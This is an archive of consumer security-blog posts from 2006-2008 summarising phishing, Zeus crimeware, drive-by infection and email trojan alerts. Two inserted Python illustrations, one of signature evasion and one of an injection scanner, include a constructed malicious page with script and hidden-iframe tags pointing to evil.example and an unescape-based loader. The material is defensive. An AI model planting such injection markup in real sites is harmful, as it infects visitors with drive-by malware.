
Tuesday, April 22, 2008

Nowadays, all you need to do is visit the wrong site to have your personal information stolen!

On his birthday, Uriel Maimon of RSA reflected on a lot of personal things (as most of us do), as well as on how spam and phishing are becoming more sophisticated and dangerous.

One major player in the spam and phishing game is known as the "Rock Phish." In his birthday post, Uriel gives us a little historical perspective on the group:

The Rock Phish group is a phishing gang believed to be based out of Russia -- and, by some accounts, is responsible for roughly 50% of phishing attacks by volume. The Rock gang has also pioneered several new approaches in phishing: in 2004 it was the first (and, for a long time, they were the only) gang to employ bot-nets in its phishing infrastructure in order to make the attacks live longer and be more scalable. It also pioneered new techniques in its spam mails so the mail could more easily evade spam filters.

Apparently, the Rock Phish are now setting up a double whammy for anyone foolish enough to click on a socially engineered link received in a spam e-mail. Counting on the fact that a lot more people go to phishing sites than will actually type in their personal details, the Rock Phish are loading the sites with crimeware that steals personal information, automatically.

More specifically, Uriel describes the phenomenon of "drive-by infection" this way:

This is done via a technique called "drive-by infection", wherein a vulnerability in the victim's operating system, browser, or software is exploited in order to infect the victim without his/her knowledge (and much less his/her consent, or with the victim having to proactively download software). The vulnerabilities that are exploited in these situations are often unknown to the software vendors and therefore often not addressed, leaving the victims defenseless (just like your humble servant finds himself when in the company of a beautiful woman).

Even worse, it appears that the Rock Phish make it easy for any criminal to mount a pretty sophisticated phishing expedition by selling all the "tackle" necessary to do it for a measly $700.00.

Known as the "Zeus kit," in honor of the Zeus Trojan, the kit is pretty resistant to computer security programs and has the ability to mask itself using a binary generator. The binary generator sends out a unique set of numbers every time it is used, making it hard for security programs to detect since they rely on spotting what is known as a "signature." Even if a security program recognizes one signature, the binary generator changes it the next time, and the security program will probably fail to recognize it.
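To make the signature point concrete, here is a small illustration (added here, not code from the post, from RSA, or from the kit) of why a detector that relies on a whole-file hash is defeated by a generator that changes a few bytes per build, while a detector that matches on the bytes that cannot change keeps working. The "core" bytes, the junk wrapper and the blocklist are all constructed for the demo.

```python
"""Why a whole-file hash is a brittle signature against a 'binary generator'.

Added illustration; not code from the blog post or the kit it describes.
The payload, its variable wrapper and the signature list are constructed toys.
"""
import hashlib
import random

# Constructed stand-in for the part of a sample that does the actual work and
# therefore cannot change from one build to the next.
INVARIANT_CORE = b"CONSTRUCTED-INVARIANT-CORE"


def build_variant(seed: int) -> bytes:
    """Constructed stand-in for a generator: same core, different junk around it."""
    rng = random.Random(seed)
    prefix = bytes(rng.randrange(256) for _ in range(rng.randrange(4, 24)))
    suffix = bytes(rng.randrange(256) for _ in range(rng.randrange(4, 24)))
    return prefix + INVARIANT_CORE + suffix


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def hash_signature_hits(samples, known_hashes):
    """Detector 1: exact SHA-256 match, the way a naive hash blocklist works."""
    return [sha256_hex(s) in known_hashes for s in samples]


def pattern_signature_hits(samples, pattern):
    """Detector 2: match on the invariant byte sequence (what a YARA-style rule does)."""
    return [pattern in s for s in samples]


def compare_detectors(n_variants: int = 5) -> dict:
    """Run both detectors over several builds; only build 0 was ever seen by the analyst."""
    samples = [build_variant(seed) for seed in range(n_variants)]
    known = {sha256_hex(samples[0])}  # the one hash that made it onto the blocklist
    return {
        "hash": hash_signature_hits(samples, known),
        "pattern": pattern_signature_hits(samples, INVARIANT_CORE),
    }


if __name__ == "__main__":
    for name, hits in compare_detectors().items():
        print(f"{name:8s} {hits}")
```

The hash detector catches only the build it already knows; every other build from the same generator slips past it, which is exactly the effect the paragraph describes. The pattern detector still fires because the working part of the sample is unchanged, which is why signature vendors write rules on invariant code and behaviour rather than on file hashes alone.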

For the less technically inclined, the Zeus Kit offers a lot of operational capabilities for the information thief. Some of these capabilities are "the ability to take screenshots of a victim's machine, or control it remotely, or add additional pages to a website and monitor it, or steal passwords that have been stored by popular programs," according to Uriel.

There is little doubt that criminal groups like the Rock Phish are making the Internet more dangerous all the time. As far as getting infected while "driving by" a site goes, Websense announced today that a mass attack via malicious JavaScript injection is infecting thousands of trusted sites, including government ones. According to a report released today, this activity has exploded by a "factor of ten."
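For anyone who runs a web site and wants to check whether their own pages have been hit by this kind of injection, here is a small scanner (added here; it is not Websense code) that walks an HTML page and flags script tags loading from hosts outside an allowlist, hidden iframes, and inline scripts that use the escaped `document.write`/`unescape` pattern typical of injected loaders. The two sample pages, the allowlist and the `evil.example` host are constructed for the demo.

```python
"""Flag script/iframe injections in an HTML page.

Added illustration; not code from the blog post or from Websense. The sample pages,
the allowlist and the hostnames below are constructed for this demo.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (constructed).
ALLOWED_SCRIPT_HOSTS = {"www.example.gov", "static.example.gov"}

# Inline patterns typical of injected loaders: escaped markup written with
# document.write/eval + unescape, or a long run of %XX escapes.
SUSPICIOUS_INLINE = [
    re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I),
    re.compile(r"eval\s*\(\s*unescape\s*\(", re.I),
    re.compile(r"(?:%[0-9a-f]{2}){20,}", re.I),
]


class InjectionScanner(HTMLParser):
    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = allowed_hosts
        self.findings = []        # (kind, detail) tuples
        self._in_script = False

    def _external(self, url):
        host = urlparse(url).hostname or ""
        return bool(host) and host not in self.allowed_hosts  # relative URLs are same-origin

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._in_script = True
            if attrs.get("src") and self._external(attrs["src"]):
                self.findings.append(("external-script", attrs["src"]))
        elif tag == "iframe":
            src = attrs.get("src", "")
            if self._external(src):
                self.findings.append(("external-iframe", src))
            if attrs.get("width") == "0" or attrs.get("height") == "0":
                self.findings.append(("hidden-iframe", src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script bodies to handle_data as raw text.
        if self._in_script:
            for pat in SUSPICIOUS_INLINE:
                if pat.search(data):
                    self.findings.append(("obfuscated-inline", pat.pattern))


def scan_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (kind, detail) findings for one page; empty means nothing flagged."""
    scanner = InjectionScanner(allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample pages.
CLEAN_PAGE = """<html><head>
<script src="https://static.example.gov/app.js"></script>
<script src="/js/local.js"></script>
<script>var tracking = 1;</script>
</head><body><p>Welcome</p></body></html>"""

_ESCAPED = "".join("%%%02X" % ord(c) for c in '<iframe src="http://evil.example/"></iframe>')
INJECTED_PAGE = f"""<html><head>
<script src="https://static.example.gov/app.js"></script>
<script src="http://evil.example/ngg.js"></script>
</head><body><p>Welcome</p>
<iframe src="http://evil.example/in.cgi" width="0" height="0"></iframe>
<script>document.write(unescape('{_ESCAPED}'));</script>
</body></html>"""

if __name__ == "__main__":
    print("clean:", scan_html(CLEAN_PAGE))
    for kind, detail in scan_html(INJECTED_PAGE):
        print(f"injected: {kind:18s} {detail}")
```

The allowlist is the important part: an injected script tag looks syntactically identical to a legitimate one, so the only reliable static signal is that it loads from somewhere the site never intended. Run it against a crawl of your own pages, or against the HTML your web server is actually serving, since injections are usually done by modifying files on the server rather than in a repository.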

Sophos also mentioned in its Q1 Security Threat Report that it is finding infected web pages at a rate of one every five seconds.

In simple terms, all the average web surfer has to do is visit one of these sites to become infected and have all their information stolen from them.

It's probably a good time to make sure you've updated the protection on your computer and to just say delete to any spam getting past whatever filter you are currently using. By the way, has anyone besides me noticed that more and more spam has been getting past these filters in the past couple of weeks?

Blog post at RSA by Uriel Maimon, here.

By the way, I noticed that despite a lot of us commenting on this great post, no one bothered to wish him a Happy Birthday. The post has a lot of good information on it and it would be nice to thank him for educating the rest of us.

Tuesday, February 19, 2008

Habbo Hotel Trojan Downloader poses as social networking site tool

Websense is reporting that a tool containing malicious code is being offered to "Habbo" users. The tool is being offered by someone posing as a third-party software developer.

From the Websense alert:

Websense® Security Labs™ has received reports of a Trojan keylogger aimed at the users of Habbo, a popular social networking site for teenagers. As of last month, Habbo’s entry on Wikipedia said that over 8 million unique visitors access Habbo’s Web sites around the world every month. The party involved in spreading this malicious code poses as a third-party software tool developer for Habbo.

There seems to be very little out there about this, but I was able to find a BBC article from November about a teenager stealing 4,000 euros' worth of virtual furniture that had been bought with real money.

Based on the article, this isn't the first time (or probably the last) that Habbo users have faced the murkier waters of the Internet.

The article states:

A spokesman for Sulake, the company that operates Habbo Hotel, said: "The accused lured victims into handing over their Habbo passwords by creating fake Habbo websites.

"In Habbo, as in many other virtual worlds, scamming for other people's personal information such as user names has been problematic for quite a while.

"We have had much of this scamming going on in many countries but this is the first case where the police have taken legal action."

According to the article, there are a lot of spoofed Habbo sites, asking for user name and password information. FSecure.com did another article with screenshots of some of these spoofed sites.

In case anyone besides me is having a hard time understanding how real money is used to buy virtual furniture, Wikipedia offers an explanation:

Credits, also known as Coins on other websites, are the currency used in Habbo. Credits can be purchased using a variety of different services, such as credit card, a telephone service and via SMS. Credits are often given out as prizes for competitions held in the community. The Credits are stored in the user's purse, accessible in any public or private room as well as on the Hotel view and while logged in on the website. Credits can also be redeemed into Exchange, which displays the Credits as an item of virtual furniture; the furniture can then be traded among users and redeemed back into Credits.

At least now I can understand why someone would want to break into a Habbo account - they do have real money in them.

This might not have been the first time Habbo users have been exposed to assorted forms of malicious code. I found a discussion on Habbohut, a Habbo bulletin board, where the matter was being discussed in 2005.

Going back to the current alert from Websense, it has some pretty wise advice, which can be applied to any software tool being touted from an unknown source:

Websense Security Labs recommends caution when trying out new third-party applications developed for Web 2.0 and social networking Web sites, especially those with APIs open for third-party developers.

In other words, just say no!

Websense alert with screenshots, here.

Thursday, August 30, 2007

Fake e-mail from the BBB stating someone complained about you is a scam!

If you get an e-mail from the Better Business Bureau stating that a complaint has been made against you - it might be a good idea to just delete it.

Websense is reporting:

Websense® Security Labs™ has received reports of a new email spam variant similar to an attack launched early this year. The spoofed email purports to be from the Better Business Bureau (BBB). The message claims that a complaint has been filed against the recipient's company. Attached to the message is a Microsoft Word document (Document_for_Case.doc), supposedly containing additional details regarding the complaint. The Word document actually contains a Trojan Downloader that, when opened, attempts to download and install a keylogger. This keylogger uploads stolen data to an IP address in Malaysia.

Keyloggers record the keystrokes on a computer and then send them back to the crooks who installed them.

They are normally interested in your password information, especially if it gives them access to personal financial data. That way they can rob you blind.

In case you just have to know whether or not you've received a complaint at the Better Business Bureau, it might be a good idea to contact them independently to inquire into it.

Their website is here.

The best way to avoid becoming compromised is to have updated security software protecting your system and, even better yet, to avoid clicking on, or even opening, unsolicited e-mails no matter who they claim to be from!

Websense alert (with screenshots), here.

Saturday, February 24, 2007

Monster lure used to install malicious code

Spoofed (spam) e-mails, claiming to be from Monster (the popular job site) are being used as a lure to install malware on computers.

The good people at Websense are reporting:

Websense® Security Labs™ has discovered emails that attempt to lure users to click on a link in order to upgrade their system security. The emails, which are spoofed from Monster, are written in HTML and claim that Monster systems have been upgraded and that users need to download a certified utility to be able to use Monster. The domain name that the emails point to are using five different IP addresses. Upon connecting to one of the IP addresses, the code is run, several files are downloaded and installed on the user's machine, and another file is downloaded and installed from a server in Denmark. The files appear to be designed to steal end-user information.

Websense alert, here.

Stealing end-user information means that anyone unfortunate enough to have this code installed on their machine could become an identity theft victim.

Clicking on a link from an unsolicited e-mail can be dangerous. Of course, it also pays to have your computer protection up-to-date.

These types of lures to defraud people are known as social engineering. Wikipedia has an excellent article about social engineering, here.

Unfortunately, this isn't the first time a job site has been used as a vehicle to commit fraud.

Criminals often steal personal information posted on job sites, or trick people into giving it up by pretending to offer them a job. Another well-known scam involving job sites is where people are recruited to negotiate fraudulent financial instruments (launder stolen money) and wire the money back to their (questionable) employers.

Sometimes these financial instruments are outright counterfeits, also.

The Privacy Rights Clearinghouse has information on how to avoid fraud on job sites, here.

Monday, December 11, 2006

Hotmail Accounts being held for Ransom

Websense sent out an alert showing how Hotmail accounts are being held for ransom. Here's the warning (courtesy of Websense):

Websense® Security Labs™ has received reports of a new form of cyber-extortion. Unlike previously documented cases (where end-users were infected with malicious code, certain file types were encoded or encrypted, and a ransom message was left on the machine), this attack compromises users' online web mail accounts. When end-users logged into their web mail accounts (in this case Hotmail), they noticed that all their 'sent' and 'received' emails were deleted along with all their online contacts. The only message that remained was one from the attacker that requested they contact them for payment in order to receive the data back.

In this case, the end-users had recently visited an Internet cafe where their credentials may have been compromised.

The email, which was poorly written in Spanish, roughly translates in English to:

"If you want to know where your contacts and your emails are then pay us or if you prefer to lose everything then don't write soon!"

Websense alert, here.

Computers at Internet cafes and libraries have been known to contain all kinds of malware and/or crimeware.

It's probably best to be extremely careful when entering any sort of personal information on them.